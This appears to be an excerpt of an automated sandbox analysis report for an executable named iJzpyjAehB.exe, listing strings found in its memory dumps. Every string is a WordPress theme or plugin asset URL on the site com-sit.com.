                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=6.1.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/dist/js/browser-redirect/app.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/de.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/es.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/pt-pt.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/ru.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/zh.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?v
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme-child/style.css?ver=6.1.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/animations/animations.min.css?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/animations/animations.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/css/be.css?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/css/responsive.css?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/menu.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/parallax/translate3d.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/chart.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/countdown.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=26.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/enllax.min.js?ver=26.6
